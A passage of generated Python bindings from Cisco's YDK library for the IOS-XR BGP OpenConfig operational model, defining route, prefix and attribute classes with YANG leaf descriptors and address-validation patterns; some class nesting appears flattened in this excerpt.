        def _meta_info():
            # Lazy import: the _meta module is large and only needed on demand.
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.ExtCommunity']['meta_info']

    class UnknownAttributes(_Entity_):
        """
        UnknownAttributes
        .. attribute:: attribute_type
        AttributeType
        **type**\: int
        **range:** 0..65535
        **config**\: False
        .. attribute:: attribute_length
        AttributeLength
        **type**\: int
        **range:** 0..65535
        **config**\: False
        .. attribute:: attribute_value
        Atributevalue
        **type**\: str
        **pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
        **config**\: False
        """

        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.UnknownAttributes, self).__init__()

            self.yang_name = "unknown-attributes"
            self.yang_parent_name = "ext-attributes-list"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('attribute_type', (YLeaf(YType.uint16, 'attribute-type'), ['int'])),
                ('attribute_length', (YLeaf(YType.uint16, 'attribute-length'), ['int'])),
                ('attribute_value', (YLeaf(YType.str, 'attribute-value'), ['str'])),
            ])
            self.attribute_type = None
            self.attribute_length = None
            self.attribute_value = None
            self._segment_path = lambda: "unknown-attributes"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.UnknownAttributes, ['attribute_type', 'attribute_length', 'attribute_value'], name, value)

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.UnknownAttributes']['meta_info']

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList']['meta_info']
class LastModifiedDate(_Entity_):
    """
    LastModifiedDate
    .. attribute:: time_value
    TimeValue
    **type**\: str
    **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 3 vs legacy Python 2 super() invocation for the generated base.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastModifiedDate, self).__init__()

        self.yang_name = "last-modified-date"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
        ])
        self.time_value = None
        self._segment_path = lambda: "last-modified-date"
        # Freeze: subsequent attribute writes are validated by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastModifiedDate, ['time_value'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import: the _meta module is large and only needed on demand.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastModifiedDate']['meta_info']
class LastUpdateRecieved(_Entity_):
    """
    LastUpdateRecieved

    NOTE(review): the "Recieved" misspelling originates in the YANG model
    (yang_name "last-update-recieved") and must be kept for wire fidelity.

    .. attribute:: time_value
    TimeValue
    **type**\: str
    **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 3 vs legacy Python 2 super() invocation for the generated base.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastUpdateRecieved, self).__init__()

        self.yang_name = "last-update-recieved"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
        ])
        self.time_value = None
        self._segment_path = lambda: "last-update-recieved"
        # Freeze: subsequent attribute writes are validated by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastUpdateRecieved, ['time_value'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastUpdateRecieved']['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-table entry for this Route class."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    table_key = 'OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route'
    return meta._meta_table[table_key]['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-table entry for this Routes container."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    table_key = 'OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes'
    return meta._meta_table[table_key]['meta_info']
class NumRoutes(_Entity_):
    """
    Number of routes in adjacency rib out\-bound
    post\-policy table
    .. attribute:: num_routes
    NumRoutes
    **type**\: int
    **range:** 0..18446744073709551615
    **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 3 vs legacy Python 2 super() invocation for the generated base.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.NumRoutes, self).__init__()

        self.yang_name = "num-routes"
        self.yang_parent_name = "adj-rib-in-pre"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('num_routes', (YLeaf(YType.uint64, 'num-routes'), ['int'])),
        ])
        self.num_routes = None
        self._segment_path = lambda: "num-routes"
        # Freeze: subsequent attribute writes are validated by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.NumRoutes, ['num_routes'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import: the _meta module is large and only needed on demand.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.NumRoutes']['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-table entry for AdjRibInPre."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    table_key = 'OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre'
    return meta._meta_table[table_key]['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-table entry for OpenConfigNeighbor."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    table_key = 'OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor'
    return meta._meta_table[table_key]['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-table entry for OpenConfigNeighbors."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    table_key = 'OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors'
    return meta._meta_table[table_key]['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-table entry for Ipv4Unicast."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    table_key = 'OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast'
    return meta._meta_table[table_key]['meta_info']
class Ipv6Unicast(_Entity_):
"""
IPv6 Unicast
.. attribute:: loc_rib
Local rib route table
**type**\: :py:class:`LocRib <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib>`
**config**\: False
.. attribute:: open_config_neighbors
Neighbor list
**type**\: :py:class:`OpenConfigNeighbors <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # Python 3 vs legacy Python 2 super() invocation for the generated base.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast, self).__init__()

    self.yang_name = "ipv6-unicast"
    self.yang_parent_name = "afi-safi-table"
    self.is_top_level_class = False
    # No YANG list between here and the module root, so an absolute path exists.
    self.has_list_ancestor = False
    self.ylist_key_names = []
    # YANG child container name -> (python attribute name, binding class).
    self._child_classes = OrderedDict([("loc-rib", ("loc_rib", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib)), ("open-config-neighbors", ("open_config_neighbors", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors))])
    self._leafs = OrderedDict()
    self.loc_rib = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib()
    self.loc_rib.parent = self
    self._children_name_map["loc_rib"] = "loc-rib"
    self.open_config_neighbors = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors()
    self.open_config_neighbors.parent = self
    self._children_name_map["open_config_neighbors"] = "open-config-neighbors"
    self._segment_path = lambda: "ipv6-unicast"
    self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/%s" % self._segment_path()
    # Freeze: subsequent attribute writes are validated by __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through YDK's validating setter (no leaves here)."""
    ipv6_unicast_class = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast
    self._perform_setattr(ipv6_unicast_class, [], name, value)
class LocRib(_Entity_):
"""
Local rib route table
.. attribute:: routes
routes table
**type**\: :py:class:`Routes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes>`
**config**\: False
.. attribute:: num_routes
Number of routes in adjacency rib out\-bound post\-policy table
**type**\: :py:class:`NumRoutes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.NumRoutes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # Python 3 vs legacy Python 2 super() invocation for the generated base.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib, self).__init__()

    self.yang_name = "loc-rib"
    self.yang_parent_name = "ipv6-unicast"
    self.is_top_level_class = False
    # No YANG list between here and the module root, so an absolute path exists.
    self.has_list_ancestor = False
    self.ylist_key_names = []
    # YANG child container name -> (python attribute name, binding class).
    self._child_classes = OrderedDict([("routes", ("routes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes)), ("num-routes", ("num_routes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.NumRoutes))])
    self._leafs = OrderedDict()
    self.routes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes()
    self.routes.parent = self
    self._children_name_map["routes"] = "routes"
    self.num_routes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.NumRoutes()
    self.num_routes.parent = self
    self._children_name_map["num_routes"] = "num-routes"
    self._segment_path = lambda: "loc-rib"
    self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/%s" % self._segment_path()
    # Freeze: subsequent attribute writes are validated by __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through YDK's validating setter (no leaves here)."""
    loc_rib_class = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib
    self._perform_setattr(loc_rib_class, [], name, value)
class Routes(_Entity_):
"""
routes table
.. attribute:: route
route entry
**type**\: list of :py:class:`Route <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # Python 3 vs legacy Python 2 super() invocation for the generated base.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes, self).__init__()

    self.yang_name = "routes"
    self.yang_parent_name = "loc-rib"
    self.is_top_level_class = False
    # No YANG list between here and the module root, so an absolute path exists.
    self.has_list_ancestor = False
    self.ylist_key_names = []
    # YANG child list name -> (python attribute name, binding class).
    self._child_classes = OrderedDict([("route", ("route", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route))])
    self._leafs = OrderedDict()
    # "route" is a YANG list; YList keeps entries bound to this parent.
    self.route = YList(self)
    self._segment_path = lambda: "routes"
    self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/%s" % self._segment_path()
    # Freeze: subsequent attribute writes are validated by __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through YDK's validating setter (no leaves here)."""
    routes_class = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes
    self._perform_setattr(routes_class, [], name, value)
class Route(_Entity_):
"""
route entry
.. attribute:: route
Network in prefix/length format
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])/(([0\-9])\|([1\-2][0\-9])\|(3[0\-2]))
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(/(([0\-9])\|([0\-9]{2})\|(1[0\-1][0\-9])\|(12[0\-8])))
**config**\: False
.. attribute:: neighbor_address
Neighbor address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: path_id
Path ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_name
Prefix
**type**\: :py:class:`PrefixName <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.PrefixName>`
**config**\: False
.. attribute:: route_attr_list
RouteAttributesList
**type**\: :py:class:`RouteAttrList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList>`
**config**\: False
.. attribute:: ext_attributes_list
ExtAttributesList
**type**\: :py:class:`ExtAttributesList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList>`
**config**\: False
.. attribute:: last_modified_date
LastModifiedDate
**type**\: :py:class:`LastModifiedDate <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.LastModifiedDate>`
**config**\: False
.. attribute:: last_update_recieved
LastUpdateRecieved
**type**\: :py:class:`LastUpdateRecieved <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.LastUpdateRecieved>`
**config**\: False
.. attribute:: valid_route
ValidRoute
**type**\: bool
**config**\: False
.. attribute:: invalid_reason
IndentityRef
**type**\: :py:class:`BgpOcInvalidRouteReason <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcInvalidRouteReason>`
**config**\: False
.. attribute:: best_path
BestPath
**type**\: bool
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # Generated YDK entity constructor: Python 2/3-compatible super() call
    # into the _Entity_ base class.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route, self).__init__()

    # YANG container identity: node "route" under parent "routes".
    self.yang_name = "route"
    self.yang_parent_name = "routes"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    self.ylist_key_names = []
    # Map of YANG child-container names to (python attr name, binding class).
    # Ordering mirrors the YANG model and must match the generated meta tables.
    self._child_classes = OrderedDict([("prefix-name", ("prefix_name", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.PrefixName)), ("route-attr-list", ("route_attr_list", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList)), ("ext-attributes-list", ("ext_attributes_list", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList)), ("last-modified-date", ("last_modified_date", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.LastModifiedDate)), ("last-update-recieved", ("last_update_recieved", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.LastUpdateRecieved))])
    # Leaf descriptors: python attr -> (YLeaf(type, yang-name), accepted python types).
    # ['str','str'] marks a union of two string-typed leaf patterns (IPv4/IPv6).
    self._leafs = OrderedDict([
        ('route', (YLeaf(YType.str, 'route'), ['str','str'])),
        ('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str','str'])),
        ('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
        ('valid_route', (YLeaf(YType.boolean, 'valid-route'), ['bool'])),
        ('invalid_reason', (YLeaf(YType.enumeration, 'invalid-reason'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcInvalidRouteReason', '')])),
        ('best_path', (YLeaf(YType.boolean, 'best-path'), ['bool'])),
    ])
    # Leaf values start unset; populated by the YDK runtime on read.
    self.route = None
    self.neighbor_address = None
    self.path_id = None
    self.valid_route = None
    self.invalid_reason = None
    self.best_path = None

    # Eagerly instantiate singleton child containers and link them back.
    self.prefix_name = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.PrefixName()
    self.prefix_name.parent = self
    self._children_name_map["prefix_name"] = "prefix-name"

    self.route_attr_list = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList()
    self.route_attr_list.parent = self
    self._children_name_map["route_attr_list"] = "route-attr-list"

    self.ext_attributes_list = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList()
    self.ext_attributes_list.parent = self
    self._children_name_map["ext_attributes_list"] = "ext-attributes-list"

    self.last_modified_date = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.LastModifiedDate()
    self.last_modified_date.parent = self
    self._children_name_map["last_modified_date"] = "last-modified-date"

    self.last_update_recieved = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.LastUpdateRecieved()
    self.last_update_recieved.parent = self
    self._children_name_map["last_update_recieved"] = "last-update-recieved"

    # Path fragments used to build the XPath for NETCONF/RESTCONF queries.
    self._segment_path = lambda: "route"
    self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/routes/%s" % self._segment_path()
    # Freeze: _perform_setattr rejects creation of new attributes from here on.
    self._is_frozen = True
def __setattr__(self, name, value):
    # Delegate to the YDK base so leaf assignments are validated against the
    # declared leaf list and new attributes are blocked once frozen.
    self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route, ['route', 'neighbor_address', 'path_id', 'valid_route', 'invalid_reason', 'best_path'], name, value)
class PrefixName(_Entity_):
    """
    Prefix

    .. attribute:: prefix

    	Prefix
    	**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.PrefixName.Prefix>`

    	**config**\: False

    .. attribute:: prefix_length

    	Prefix length
    	**type**\: int

    	**range:** 0..255

    	**config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 2/3-compatible super() call into the _Entity_ base class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.PrefixName, self).__init__()

        self.yang_name = "prefix-name"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = False
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("prefix", ("prefix", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.PrefixName.Prefix))])
        self._leafs = OrderedDict([
            ('prefix_length', (YLeaf(YType.uint8, 'prefix-length'), ['int'])),
        ])
        self.prefix_length = None

        # Singleton child container for the address part of the prefix.
        self.prefix = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.PrefixName.Prefix()
        self.prefix.parent = self
        self._children_name_map["prefix"] = "prefix"
        self._segment_path = lambda: "prefix-name"
        self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/routes/route/%s" % self._segment_path()
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Validated assignment via the YDK base; only 'prefix_length' is a leaf.
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.PrefixName, ['prefix_length'], name, value)


    class Prefix(_Entity_):
        """
        Prefix

        .. attribute:: afi

        	AFI
        	**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`

        	**config**\: False

        .. attribute:: ipv4_address

        	IPv4 Addr
        	**type**\: str

        	**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

        	**config**\: False

        .. attribute:: ipv6_address

        	IPv6 Addr
        	**type**\: str

        	**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

        	**config**\: False

        """

        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.PrefixName.Prefix, self).__init__()

            self.yang_name = "prefix"
            self.yang_parent_name = "prefix-name"
            self.is_top_level_class = False
            self.has_list_ancestor = False
            self.ylist_key_names = []
            # Leaf-only container: no YANG children.
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
                ('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
                ('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
            ])
            self.afi = None
            self.ipv4_address = None
            self.ipv6_address = None
            self._segment_path = lambda: "prefix"
            self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/routes/route/prefix-name/%s" % self._segment_path()
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.PrefixName.Prefix, ['afi', 'ipv4_address', 'ipv6_address'], name, value)

        @staticmethod
        def _meta_info():
            # Lazy import avoids loading the (large) meta module unless needed.
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.PrefixName.Prefix']['meta_info']

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the (large) meta module unless needed.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.PrefixName']['meta_info']
class RouteAttrList(_Entity_):
    """
    RouteAttributesList

    .. attribute:: next_hop

    	NextHopAddress
    	**type**\: :py:class:`NextHop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.NextHop>`

    	**config**\: False

    .. attribute:: aggregrator_attributes

    	AggregatorList
    	**type**\: :py:class:`AggregratorAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.AggregratorAttributes>`

    	**config**\: False

    .. attribute:: origin_type

    	Origin Attribute Type
    	**type**\: :py:class:`BgpOcOriginAttr <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcOriginAttr>`

    	**config**\: False

    .. attribute:: as_path

    	AS Path
    	**type**\: str

    	**config**\: False

    .. attribute:: as4_path

    	AS4 Path
    	**type**\: str

    	**config**\: False

    .. attribute:: med

    	Med
    	**type**\: int

    	**range:** 0..4294967295

    	**config**\: False

